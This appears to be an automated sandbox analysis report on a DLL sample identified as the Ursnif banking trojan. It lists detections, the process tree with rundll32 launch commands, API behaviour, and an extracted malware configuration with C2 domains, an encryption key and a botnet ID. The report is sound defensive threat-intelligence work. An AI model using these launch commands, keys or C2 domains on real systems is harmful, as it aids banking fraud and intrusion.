Play interactive tour

Edit tour

Windows Analysis Report 0f.dll

Overview

General Information

Sample Name:	0f.dll
Analysis ID:	498857
MD5:	0f90b21a2cdc35511626509c67c8cbf5
SHA1:	1293aa454365b3679afd77b34749ce8e175c997a
SHA256:	95dbbfc33223e8e670b4f25d086d65a41d67f0434d3fe37469a7bd23e134f1f6
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Writes or reads registry keys via WMI

Writes registry values via WMI

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Queries the installation date of Windows

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 5268 cmdline: loaddll32.exe 'C:\Users\user\Desktop\0f.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 5160 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\0f.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4760 cmdline: rundll32.exe 'C:\Users\user\Desktop\0f.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 2316 cmdline: rundll32.exe C:\Users\user\Desktop\0f.dll,Start MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 2988 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 2964 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2988 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "YspyHla3Q+Y+mL+jkDMPo0K37HDx3ZQpkC6iMQ9FB0Jvz67qLEuPPd+7itRbk+5jPXxEvcc4HELzBbK+zEpcnk3gfkFepE47XU1UkIqwsz5EFKG4uDfy9jLX4cSD4IKUeWVT2AmhhkhIjXebeVqL2cavKIWzE+O11PlMSJB8CPxu3rcoXlZgOw7DYBYyTHdQlEkgzTqDwlIzW3bdSDtO0jlb1GqIU5jAVZj0nusFmwufXbMRHKThAuzV0SiB8H0jceNWGALcy01VeCV7PJrnPe8wCvy64gODn28q2topDihJ51KGWbMNR5jWjFp/LTmfqJ9+UqlA3XrMm4Ht2D3DJEE72pdtZyqrd+EuqZEvdjw=", "c2_domain": ["app5.folion.xyz", "wer.defone.click", "app10.laptok.at", "apt.feel500.at", "init.in100k.at"], "botnet": "2500", "server": "580", "serpent_key": "lOrlLLFRkSMi2UOq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.739535676.00000000040A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000003.706311406.0000000005BB9000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000001.00000003.739521647.00000000040A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.739458564.00000000040A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.739502896.00000000040A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.739363916.00000000040A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000004.00000002.706735766.00000000011F0000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000001.00000002.813265596.00000000040A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000005.00000002.809626071.0000000000A30000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000001.00000003.739321134.00000000040A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000002.813125689.00000000038F9000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000001.00000003.739404580.00000000040A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000002.810063319.0000000000F60000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000001.00000003.739481698.00000000040A8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 5268	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.loaddll32.exe.38f94a0.3.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.loaddll32.exe.10000000.4.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.loaddll32.exe.f60000.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.loaddll32.exe.38f94a0.3.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.2.rundll32.exe.11f0000.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.2.rundll32.exe.1370000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.3.rundll32.exe.5bb94a0.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.2.rundll32.exe.10000000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.2.rundll32.exe.a30000.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
1.2.loaddll32.exe.f90000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.3.rundll32.exe.5bb94a0.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 6 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: 0f.dll

Avira: detected

Found malware configuration

Show sources

Source: 1.2.loaddll32.exe.38f94a0.3.raw.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "YspyHla3Q+Y+mL+jkDMPo0K37HDx3ZQpkC6iMQ9FB0Jvz67qLEuPPd+7itRbk+5jPXxEvcc4HELzBbK+zEpcnk3gfkFepE47XU1UkIqwsz5EFKG4uDfy9jLX4cSD4IKUeWVT2AmhhkhIjXebeVqL2cavKIWzE+O11PlMSJB8CPxu3rcoXlZgOw7DYBYyTHdQlEkgzTqDwlIzW3bdSDtO0jlb1GqIU5jAVZj0nusFmwufXbMRHKThAuzV0SiB8H0jceNWGALcy01VeCV7PJrnPe8wCvy64gODn28q2topDihJ51KGWbMNR5jWjFp/LTmfqJ9+UqlA3XrMm4Ht2D3DJEE72pdtZyqrd+EuqZEvdjw=", "c2_domain": ["app5.folion.xyz", "wer.defone.click", "app10.laptok.at", "apt.feel500.at", "init.in100k.at"], "botnet": "2500", "server": "580", "serpent_key": "lOrlLLFRkSMi2UOq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: 0f.dll	Metadefender: Detection: 24%			Perma Link
Source: 0f.dll	ReversingLabs: Detection: 78%

Machine Learning detection for sample

Show sources

Source: 0f.dll

Joe Sandbox ML: detected

Source: 5.2.rundll32.exe.10000000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 1.2.loaddll32.exe.10000000.4.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_00F935A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

1_2_00F935A1

Source: 0f.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00F94E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		1_2_00F94E9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01374E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,		4_2_01374E9C

Networking:

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: app5.folion.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: app5.folion.xyz
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	DNS query: app5.folion.xyz

Source: msapplication.xml0.19.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x9b482054,0x01d7bbce</date><accdate>0x9b482054,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.19.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x9b482054,0x01d7bbce</date><accdate>0x9b482054,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.19.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x9b4f4795,0x01d7bbce</date><accdate>0x9b4f4795,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.19.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x9b4f4795,0x01d7bbce</date><accdate>0x9b4f4795,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.19.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x9b566f66,0x01d7bbce</date><accdate>0x9b566f66,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.19.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x9b566f66,0x01d7bbce</date><accdate>0x9b566f66,0x01d7bbce</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: loaddll32.exe, 00000001.00000002.810736280.000000000119B000.00000004.00000020.sdmp	String found in binary or memory: http://app5.folion.xyz
Source: {C5D724C3-27C1-11EC-90E9-ECF4BB862DED}.dat.19.dr	String found in binary or memory: http://app5.folion.xyz/C6VmqHmn62rFCww6y4ysR/P0nI5lbrE_2FoyZm/BDBmvveWjO3LK9Q/55XxQq6CmCPdNvBaEz/m5n
Source: msapplication.xml.19.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.19.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.19.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.19.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.19.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.19.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.19.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.19.dr	String found in binary or memory: http://www.youtube.com/

Source: unknown

DNS traffic detected: queries for: app5.folion.xyz

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.739535676.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739521647.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739458564.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739502896.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739363916.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.813265596.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739321134.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739404580.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739481698.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match	File source: 1.2.loaddll32.exe.38f94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.38f94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.11f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1370000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.5bb94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.a30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.5bb94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.706311406.0000000005BB9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.706735766.00000000011F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.809626071.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.813125689.00000000038F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.810063319.0000000000F60000.00000004.00000001.sdmp, type: MEMORY

Source: loaddll32.exe, 00000001.00000002.810736280.000000000119B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.739535676.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739521647.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739458564.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739502896.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739363916.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.813265596.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739321134.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739404580.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.739481698.00000000040A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match	File source: 1.2.loaddll32.exe.38f94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.f60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.38f94a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.11f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.1370000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.5bb94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.a30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.5bb94a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.706311406.0000000005BB9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.706735766.00000000011F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.809626071.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.813125689.00000000038F9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.810063319.0000000000F60000.00000004.00000001.sdmp, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe

1_2_00F935A1

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: 0f.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02E9810A	1_2_02E9810A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10002264	1_2_10002264
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00F96609	1_2_00F96609
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00F97FA8	1_2_00F97FA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0515810A	4_2_0515810A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01377FA8	4_2_01377FA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01376609	4_2_01376609
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF9305	5_2_04AF9305
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF1000	5_2_04AF1000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF3F1C	5_2_04AF3F1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF3AAF	5_2_04AF3AAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF33AA	5_2_04AF33AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AFBDAA	5_2_04AFBDAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AFB4AA	5_2_04AFB4AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AFA6BB	5_2_04AFA6BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF59E4	5_2_04AF59E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AFA4FC	5_2_04AFA4FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF1BF7	5_2_04AF1BF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF7FF1	5_2_04AF7FF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF21C0	5_2_04AF21C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AFA3DD	5_2_04AFA3DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF75DC	5_2_04AF75DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF2E21	5_2_04AF2E21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF810A	5_2_04AF810A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF2D03	5_2_04AF2D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AFC217	5_2_04AFC217
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF204B	5_2_04AF204B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF2F59	5_2_04AF2F59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF1458	5_2_04AF1458
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AFA257	5_2_04AFA257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04AF1556	5_2_04AF1556
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10002264	5_2_10002264

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10001B89 NtMapViewOfSection,	1_2_10001B89
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_100018D1 GetProcAddress,NtCreateSection,memset,	1_2_100018D1
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10002485 NtQueryVirtualMemory,	1_2_10002485
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00F93CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_00F93CA1
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00F981CD NtQueryVirtualMemory,	1_2_00F981CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_01373CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	4_2_01373CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_013781CD NtQueryVirtualMemory,	4_2_013781CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_10002485 NtQueryVirtualMemory,	5_2_10002485

Source: 0f.dll	Metadefender: Detection: 24%
Source: 0f.dll	ReversingLabs: Detection: 78%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_00F919E7 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

1_2_00F919E7

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0f.dll,Start

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\0f.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\0f.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0f.dll,Start
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\0f.dll',#1
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2988 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\0f.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\0f.dll,Start	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\0f.dll',#1	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2988 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFCB4F6EF3903B6C34.TMP

Jump to behavior

Source: classification engine

Classification label: mal96.troj.winDLL@10/19@3/0

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02E9810A push ebp; mov dword ptr [esp], FFFF0000h	1_2_02E98113
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02E9810A push dword ptr [ebp-04h]; mov dword ptr [esp], eax	1_2_02E99137
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02E9810A push dword ptr [ebp-0Ch]; mov dword ptr [esp], ecx	1_2_02E991AC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02E9810A push dword ptr [ebp-04h]; mov dword ptr [esp], esp	1_2_02E991E2
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02E9810A push esi; mov dword ptr [esp], 000FFFFFh	1_2_02E99204
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02E9810A push 00000000h; mov dword ptr [esp], esi	1_2_02E99293
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02E95B06 push 00000000h; mov dword ptr [esp], ebp	1_2_02E95B45
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02E95B06 push edi; mov dword ptr [esp], 00000003h	1_2_02E95B69
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02E95B06 push ebx; mov dword ptr [esp], 00F00000h	1_2_02E95B72
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10002200 push ecx; ret	1_2_10002209
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10002253 push ecx; ret	1_2_10002263
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00F9A2D8 pushad ; iretd	1_2_00F9A2D9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00F9A2D4 pushad ; iretd	1_2_00F9A2D9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00F9A294 pushad ; iretd	1_2_00F9A2D9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00F9B67C push ss; retf	1_2_00F9B690
